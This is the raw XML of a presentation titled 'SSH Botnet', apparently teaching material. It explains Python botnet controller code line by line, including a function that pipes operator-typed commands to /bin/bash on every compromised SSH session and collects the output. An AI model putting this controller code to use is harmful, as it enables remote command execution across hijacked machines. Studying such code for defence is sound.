              <a:rPr lang="uk-UA" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>The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bot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will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not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be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added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to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the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botnet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list</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>.")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Prints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error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message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0136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63CF0EC-9DBE-4EE2-6CC1-A6D0E8B44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248285"/>
            <a:ext cx="11818620" cy="62410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b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>def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ask_for_command</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>():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Defines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</a:rPr>
              <a:t>ask_for_command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function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prompt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for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command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run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while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True</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>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Starts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infinite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loop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if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not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botnet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>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Checks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botnet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list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empty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print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Fore.RED</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> + "[!] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>Error</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>No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bots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available</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>.")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Prints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error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message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no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are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available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break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Exits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loop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run</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>input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Fore.GREEN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> + "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>Enter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>command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to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run</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>or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type</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>exit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>to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return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to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menu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>): ")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Prompts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for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command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if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run.lower</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>() == '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>exit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>':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Checks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command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is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>exit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>'.</a:t>
            </a:r>
            <a:endParaRPr lang="uk-UA" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>break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Exits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loop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botnet_command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run</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>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Sends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command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all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bots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1736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67BF689-D4E2-3F31-68D1-11674657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" y="248285"/>
            <a:ext cx="11490960" cy="604297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uk-UA" b="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>def bash():</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>: Defines the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>bash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> function to run commands in bash.</a:t>
            </a:r>
            <a:endParaRPr lang="uk-UA"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="uk-UA" b="1" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>while</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>True</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Starts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an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infinite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loop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="uk-UA"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="uk-UA" b="1" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>if</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>not</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>botnet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Checks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if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the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botnet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list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is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empty</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="uk-UA"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>print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Fore.RED</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> + "[!] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>Error</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>No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bots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available</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>.")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Prints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error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message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no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are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available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break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Exits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loop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bash_command</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>input</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>("&gt;&gt;&gt; ")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Prompts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for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bash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command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for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client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in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botnet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>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Iterates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through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each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botnet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if</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>session</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>in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client</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>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Checks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has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active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session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session</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>client</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>['</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>session</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>']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Retrieves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session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object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>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>output = send_command(session, f"echo {bash_command} | /bin/bash")</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>: Sends the command and gets the output.</a:t>
            </a:r>
            <a:endParaRPr lang="uk-UA"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>print</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>(f"[+] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>Output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from</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> " + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>client</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>['</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>host</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>'])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Prints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bot's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host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print</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>("&lt;&lt;&lt; " + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>output.decode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>())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Prints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command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output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else</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>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If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no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session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found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>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>print(Fore.RED + f"[!] Error: No session found for {client['host']}")</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>: Prints an error message.</a:t>
            </a:r>
            <a:endParaRPr lang="uk-UA"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>if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bash_command.lower</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>() == '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>exit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>':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Checks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command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is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>exit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>'.</a:t>
            </a:r>
            <a:endParaRPr lang="uk-UA" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="uk-UA" b="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>break</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="uk-UA">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>: Exits the loop.</a:t>
            </a:r>
            <a:endParaRPr lang="uk-UA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9824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4" baseType="lpstr">
      <vt:lpstr>Тема Office</vt:lpstr>
      <vt:lpstr>SSH Botnet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45</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-07-26T23:42:55Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-07-26T23:46:41Z</dcterms:modified>
</cp:coreProperties>
</file>